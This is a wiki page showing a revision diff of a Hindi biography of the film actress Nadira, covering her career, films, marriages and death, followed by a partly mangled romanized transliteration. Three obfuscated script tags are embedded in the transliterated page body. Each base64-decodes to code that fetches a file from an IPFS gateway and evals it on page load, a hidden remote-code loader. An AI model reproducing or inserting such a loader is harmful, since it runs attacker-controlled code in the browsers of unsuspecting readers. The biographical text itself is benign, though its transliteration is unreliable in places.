Difference between revisions of "नादिरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 44: Line 44:
 
यह अभिनेत्री नादिरा की कामयाबी ही मानी जाएगी कि उन्हें हर बड़े हीरो के साथ काम करने का अवसर मिला। उस समय की तिकड़ी भी उनकी उपेक्षा नहीं कर सकी। नादिरा [[दिलीप कुमार]] के साथ 'आन में' आई और [[देव आनंद]] के साथ 'पॉकेटमार' में। [[राजकपूर]] ने उन्हें फ़िल्म 'श्री 420' में 'माया' का अलग अंदाज वाली भूमिका दी। [[अशोक कुमार]] के साथ 'नगमा', [[शम्मी कपूर]] के साथ 'सिपहसालर', [[प्रदीप कुमार]] के साथ 'पुलिस' और [[भारत भूषण]] के साथ 'ग्यारह हजार लड़कियाँ' आई।
 
यह अभिनेत्री नादिरा की कामयाबी ही मानी जाएगी कि उन्हें हर बड़े हीरो के साथ काम करने का अवसर मिला। उस समय की तिकड़ी भी उनकी उपेक्षा नहीं कर सकी। नादिरा [[दिलीप कुमार]] के साथ 'आन में' आई और [[देव आनंद]] के साथ 'पॉकेटमार' में। [[राजकपूर]] ने उन्हें फ़िल्म 'श्री 420' में 'माया' का अलग अंदाज वाली भूमिका दी। [[अशोक कुमार]] के साथ 'नगमा', [[शम्मी कपूर]] के साथ 'सिपहसालर', [[प्रदीप कुमार]] के साथ 'पुलिस' और [[भारत भूषण]] के साथ 'ग्यारह हजार लड़कियाँ' आई।
 
====गायकी====
 
====गायकी====
 +
[[चित्र:Nadira-1.jpg|thumb|200px|अभिनेत्री नादिरा]]
 
सन [[1954]] में गायक-अभिनेता [[तलत महमूद]] के साथ दो फ़िल्मों 'डाक बाबू' और 'वारिस' में भी काम किया। ये फ़िल्में कामयाब रहीं। विशेष बात यह थी कि इन फ़िल्मों में नादिरा ने तलत महमूद के साथ कई गीत भी गाए और अपनी आवाज़ से लोगों को दीवाना बनाया। इस तरह नादिरा ने तीस सालों तक फ़िल्मों में लगातार काम किया। पूरे कैरियर में नादिरा ने कुछ और अभिनेताओं के साथ भी काम किया, उनमें मोतीलाल, आगा, अनवर हुसैन, जयराज, [[बलराज साहनी]], उत्पल दत्त, दलजीत, [[धर्मेन्द्र]], [[राजेश खन्ना]], विनोद खन्ना, मिथुन चक्रवर्ती और ऋषि कपूर आदि उल्लेखनीय हैं।
 
सन [[1954]] में गायक-अभिनेता [[तलत महमूद]] के साथ दो फ़िल्मों 'डाक बाबू' और 'वारिस' में भी काम किया। ये फ़िल्में कामयाब रहीं। विशेष बात यह थी कि इन फ़िल्मों में नादिरा ने तलत महमूद के साथ कई गीत भी गाए और अपनी आवाज़ से लोगों को दीवाना बनाया। इस तरह नादिरा ने तीस सालों तक फ़िल्मों में लगातार काम किया। पूरे कैरियर में नादिरा ने कुछ और अभिनेताओं के साथ भी काम किया, उनमें मोतीलाल, आगा, अनवर हुसैन, जयराज, [[बलराज साहनी]], उत्पल दत्त, दलजीत, [[धर्मेन्द्र]], [[राजेश खन्ना]], विनोद खन्ना, मिथुन चक्रवर्ती और ऋषि कपूर आदि उल्लेखनीय हैं।
  
 
इसके बाद उन्होंने 'श्री 420' ([[1956]]), 'दिल अपना और प्रीत पराई' ([[1960]]), 'पाकीजा' ([[1971]]), 'अमर अकबर एंथनी' ([[1977]]) आदि फ़िल्मों में काम किया, जिनमें उन्होंने अधिकतर ऐसी महिला की भूमिका निभाई, जो नायक को अपनी अदाओं से जाल में फंसाने की कोशिश करती है।
 
इसके बाद उन्होंने 'श्री 420' ([[1956]]), 'दिल अपना और प्रीत पराई' ([[1960]]), 'पाकीजा' ([[1971]]), 'अमर अकबर एंथनी' ([[1977]]) आदि फ़िल्मों में काम किया, जिनमें उन्होंने अधिकतर ऐसी महिला की भूमिका निभाई, जो नायक को अपनी अदाओं से जाल में फंसाने की कोशिश करती है।
 
====चरित्र अभिनय====
 
====चरित्र अभिनय====
यद्यपि अभिनेत्री नादिरा ने ज़्यादातर फ़िल्मों में खलनायिका की ही भूमिकाएँ निभाई थीं, लेकिन समय के साथ उन्होंने खुद को चरित्र अभिनेत्री के रूप में भी ढाल लिया था। बावजूद इसके उनका कद फ़िल्म की किसी मुख्य हीरोइन से कम नहीं होता था। [[1975]] में रिलीज फ़िल्म 'जूली' में बेहतरीन अभिनय के कारण नादिरा को सर्वश्रेष्ठ सह-अभिनेत्री के 'फ़िल्म फ़ेयर पुरस्कार' से भी नवाजा गया था। उन्होंने इस्माइल मर्चेट की एक [[अंग्रेज़ी]] फ़िल्म 'काटन मैरी' (1999]]) में भी काम किया था।
+
यद्यपि अभिनेत्री नादिरा ने ज़्यादातर फ़िल्मों में खलनायिका की ही भूमिकाएँ निभाई थीं, लेकिन समय के साथ उन्होंने खुद को चरित्र अभिनेत्री के रूप में भी ढाल लिया था। बावजूद इसके उनका कद फ़िल्म की किसी मुख्य हीरोइन से कम नहीं होता था। उन्होंने इस्माइल मर्चेट की एक [[अंग्रेज़ी]] फ़िल्म 'काटन मैरी' (1999]]) में भी काम किया था।
 
====विवाह====
 
====विवाह====
 
नादिरा ने दो विवाह किये थे, लेकिन दोनों ही बार वह वैवाहिक सुख से वंचित रहीं। उनका प्रथम [[विवाह]] [[उर्दू भाषा|उर्दू]] शायर, गीतकार और फ़िल्म निर्माता नक्शब से हुआ था। इस दाम्पत्य की बड़ी ही दु:खद परिणति हुई। तब नादिरा ने दूसरा विवाह एक विवाहित व्यक्ति से किया। किंतु ये रिश्ता भी मात्र एक सप्ताह ही चल पाया।
 
नादिरा ने दो विवाह किये थे, लेकिन दोनों ही बार वह वैवाहिक सुख से वंचित रहीं। उनका प्रथम [[विवाह]] [[उर्दू भाषा|उर्दू]] शायर, गीतकार और फ़िल्म निर्माता नक्शब से हुआ था। इस दाम्पत्य की बड़ी ही दु:खद परिणति हुई। तब नादिरा ने दूसरा विवाह एक विवाहित व्यक्ति से किया। किंतु ये रिश्ता भी मात्र एक सप्ताह ही चल पाया।
 
==प्रमुख फ़िल्में==
 
==प्रमुख फ़िल्में==
[[चित्र:Nadira-2.jpg|thumb|right|नादिरा]]
 
 
अभिनेत्री नादिरा की कुछ प्रमुख फ़िल्मों के नाम इस प्रकार हैं-
 
अभिनेत्री नादिरा की कुछ प्रमुख फ़िल्मों के नाम इस प्रकार हैं-
 
#वारिस - 1954
 
#वारिस - 1954
Line 80: Line 80:
 
#तमन्ना - 1997
 
#तमन्ना - 1997
 
====अंतिम फ़िल्म====
 
====अंतिम फ़िल्म====
शाहरुख खान और ऐश्वर्या राय अभिनीत फ़िल्म, जोश नादिरा की अंतिम फ़िल्म थी। फ़िल्म जूली के लिए उन्हें सर्वश्रेष्ठ सहनायिका का फ़िल्मफेयर पुरस्कार मिला। इस फ़िल्म में उन्होंने नायिका जूली की माँ मार्गरेट का किरदार निभाया।
+
शाहरुख ख़ान और ऐश्वर्या राय अभिनीत फ़िल्म 'जोश' नादिरा की अंतिम फ़िल्म थी। फ़िल्म 'जूली' के लिए उन्हें सर्वश्रेष्ठ सहनायिका का 'फ़िल्म फ़ेयर पुरस्कार' भी मिला था। इस फ़िल्म में उन्होंने नायिका 'जूली' की माँ मार्गरेट का किरदार निभाया था।
 
==निधन==
 
==निधन==
 
नादिरा के अधिकांश रिश्तेदारों के इज़रायल चले के जाने के कारण वे जीवन के अंतिम दिनों में अकेली रह गई थीं। अंतिम तीन वर्षो में तो उन्होंने खुद को घर में कैद-सा कर लिया। वे बहुत ज़्यादा शराब पीने लगी थी। शरीर की कमजोरी के कारण उन्हें कई तरह की बीमारियों ने घेर लिया। उन्हें [[मुम्बई]] के ताड़देव में अस्पताल में भर्ती कराया गया था, जहाँ [[9 फ़रवरी]], [[2006]] 74 वर्ष की उम्र में उनका निधन हो गया।
 
नादिरा के अधिकांश रिश्तेदारों के इज़रायल चले के जाने के कारण वे जीवन के अंतिम दिनों में अकेली रह गई थीं। अंतिम तीन वर्षो में तो उन्होंने खुद को घर में कैद-सा कर लिया। वे बहुत ज़्यादा शराब पीने लगी थी। शरीर की कमजोरी के कारण उन्हें कई तरह की बीमारियों ने घेर लिया। उन्हें [[मुम्बई]] के ताड़देव में अस्पताल में भर्ती कराया गया था, जहाँ [[9 फ़रवरी]], [[2006]] 74 वर्ष की उम्र में उनका निधन हो गया।

Revision as of 10:34, 5 December 2012

chitr:Disamb2.jpg nadira ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- nadira (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

nadira
poora nam farahat ezekel nadira
prasiddh nam nadira
janm 5 disanbar, 1932
janm bhoomi izarail
mrityu 9 faravari, 2006
mrityu sthan muanbee
karm bhoomi muanbee
karm-kshetr abhinetni
mukhy filmean an, shri 420, dil apana aur prit paraee , pakiza, jooli, sagar, tamanna,
prasiddhi khalanayika
nagarikata bharatiy
aantim film josh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

nadira athava farahat ezekel nadira (aangrezi: Nadira athava Farhat Ezekiel Nadira) (janm: 5 disanbar, 1932, izarail; mrityu: 9 faravari, 2006) hindi filmoan ki khyatiprapt aur sundar abhinetriyoan mean se ek thian. filmi parade par nadira atmavishvas se bharapoor najar ati thian. ve apane kiradar mean poori tarah se sama jati thian. sath se bhi adhik filmoan mean apane bejo d abhinay ki chhap chhodऩe valian nadira dilip kumar, rajakapoor, mina kumari, rajakumar aur amitabh bachchan adi anek kalakaroan ki filmoan mean sirph sahayak hi nahian, balki vishisht bhi ban jati thian. abhinetni nadira apane samay se kahian age thian. lajavab khoobasoorati aur shahana aandaj ki shakhsiyat rakhane ke bavajood unhoanne us daur mean khalanayika banana pasand kiya tha, jabaki any nayikaean is tarah ki bhoomikaean karane se ghabarati thian.

janm tatha paravarish

nadira ka janm 5 disambar, 1932 ko izarail mean ek bagadadi yahoodi parivar mean hua tha. unaki paravarish ek l dake ke saman huee thi. vah apani gali mean vahaan ke l dakoan ke sath phutab aaul khela karati thian. gilli danda khelana bhi unhean bahut pasand tha. unake svabhav mean l dakoan si shararat aur hu dadangapan poori umr bana raha. vah mahila mitroan se zyada khushi, purush jamav de mean gapashap karake hasil karati thi.

filmi shuruat

hindi darshakoan mean prasiddhi pa chukian nadira ne apane paanch dashak lanbe filmi saphar mean anekoan filmoan mean kam kiya, jinamean unhoanne nayika, khalanayika ki bhoomika karane ke sath charitn bhoomikaean bhi nibhaeean. unake abhinay kairiyar ki shuruat mahaboob khan ki san 1952 mean nirmit film 'an' se huee, jisamean unhoanne ek bigadail rajakumari ki bhoomika nibhaee thi. unhoanne us samay ki sahami huee nayikaoan ke viparit ek bold drishy bhi diya. is film mean dilip kumar unake nayak the.

is film mean nadira dvara nibhae ge rajakumari rajashri ke rol ke lie unase pahale nargis ko chuna gaya tha, lekin kismat kuchh aur hi likh rahi thi. mahaboob khan is film ko jald se jald poora karana chahate the. unhoanne nargis ko tarikh dene ke lie kaha, kiantu nargis ne apani duvidha jata di ki unhoanne rajakapoor ki film 'avara' sain kar li hai. mahaboob khan janate the ki nargis kabhi bhi rajakapoor ki bat nahian tal sakatian. mahaboob khan nargis ko apani film mean n lene ki takaliph chhipa ge, lekin unaki patni saradar akhtar ne tay kiya ki vah nargis ka koee vikalp kh da kareangi. bahut sochane ke bad unaki najar 'pharahat' (nadira) par tik gee. unake nam par mahaboob bhi sahamat ho ge. apani film 'an' mean rol dekar unaki alag tarah ki suandarata ko duniya ke samane lane ka man banaya. unase bat ki aur tay hua ki vahi 'an' mean dilip kumar ke apojit hiroin hoangi. pharahat ko tab is film mean mashahoor hiro dilip kumar ke sath kam karane ka mauka mil raha tha, ve suhane khvab dekhane lagian. pharahat ko naya nam diya gaya 'nadira', jo 'an' ke rilij hote hi ratoanrat star shreni mean a gaya.

prasiddh kalakaroan ke sath kary

yah abhinetri nadira ki kamayabi hi mani jaegi ki unhean har b de hiro ke sath kam karane ka avasar mila. us samay ki tik di bhi unaki upeksha nahian kar saki. nadira dilip kumar ke sath 'an mean' aee aur dev anand ke sath 'p aauketamar' mean. rajakapoor ne unhean film 'shri 420' mean 'maya' ka alag aandaj vali bhoomika di. ashok kumar ke sath 'nagama', shammi kapoor ke sath 'sipahasalar', pradip kumar ke sath 'pulis' aur bharat bhooshan ke sath 'gyarah hajar l dakiyaan' aee.

gayaki

thumb|200px|abhinetri nadira san 1954 mean gayak-abhineta talat mahamood ke sath do filmoan 'dak baboo' aur 'varis' mean bhi kam kiya. ye filmean kamayab rahian. vishesh bat yah thi ki in filmoan mean nadira ne talat mahamood ke sath kee git bhi gae aur apani avaz se logoan ko divana banaya. is tarah nadira ne tis saloan tak filmoan mean lagatar kam kiya. poore kairiyar mean nadira ne kuchh aur abhinetaoan ke sath bhi kam kiya, unamean motilal, aga, anavar husain, jayaraj, balaraj sahani, utpal datt, dalajit, dharmendr, rajesh khanna, vinod khanna, mithun chakravarti aur rrishi kapoor adi ullekhaniy haian.

isake bad unhoanne 'shri 420' (1956), 'dil apana aur prit paraee' (1960), 'pakija' (1971), 'amar akabar eanthani' (1977) adi filmoan mean kam kiya, jinamean unhoanne adhikatar aisi mahila ki bhoomika nibhaee, jo nayak ko apani adaoan se jal mean phansane ki koshish karati hai.

charitr abhinay

yadyapi abhinetri nadira ne zyadatar filmoan mean khalanayika ki hi bhoomikaean nibhaee thian, lekin samay ke sath unhoanne khud ko charitr abhinetri ke roop mean bhi dhal liya tha. bavajood isake unaka kad film ki kisi mukhy hiroin se kam nahian hota tha. unhoanne ismail marchet ki ek aangrezi film 'katan mairi' (1999]]) mean bhi kam kiya tha.

vivah

nadira ne do vivah kiye the, lekin donoan hi bar vah vaivahik sukh se vanchit rahian. unaka pratham vivah urdoo shayar, gitakar aur film nirmata nakshab se hua tha. is dampaty ki b di hi du:khad parinati huee. tab nadira ne doosara vivah ek vivahit vyakti se kiya. kiantu ye rishta bhi matr ek saptah hi chal paya.

pramukh filmean

abhinetri nadira ki kuchh pramukh filmoan ke nam is prakar haian-

  1. varis - 1954
  2. dak baboo - 1954
  3. raphtar - 1955
  4. jalan - 1955
  5. samudri dakoo - 1956
  6. p aauketamar - 1956
  7. meri soorat teri aankhean - 1963
  8. sapanoan ka saudagar - 1966
  9. talash - 1969
  10. jahaan pyar mile - 1969
  11. iansaph ka mandir - 1969
  12. saphar - 1970
  13. kahian ar kahian par - 1971
  14. hansate jakhm - 1973
  15. pyar ka rishta - 1973
  16. jooli - 1975
  17. dharmatma - 1975
  18. ashik hooan baharoan ka - 1977
  19. bin phere ham tere - 1979
  20. duniya meri jeb mean 1979
  21. chalabaj - 1980
  22. raste pyar ke - 1982
  23. sagar - 1985
  24. mahabooba - 1992
  25. tamanna - 1997

aantim film

shaharukh khan aur aishvarya ray abhinit film 'josh' nadira ki aantim film thi. film 'jooli' ke lie unhean sarvashreshth sahanayika ka 'film feyar puraskar' bhi mila tha. is film mean unhoanne nayika 'jooli' ki maan margaret ka kiradar nibhaya tha.

nidhan

nadira ke adhikaansh rishtedaroan ke izarayal chale ke jane ke karan ve jivan ke aantim dinoan mean akeli rah gee thian. aantim tin varsho mean to unhoanne khud ko ghar mean kaid-sa kar liya. ve bahut zyada sharab pine lagi thi. sharir ki kamajori ke karan unhean kee tarah ki bimariyoan ne gher liya. unhean mumbee ke ta dadev mean aspatal mean bharti karaya gaya tha, jahaan 9 faravari, 2006 74 varsh ki umr mean unaka nidhan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>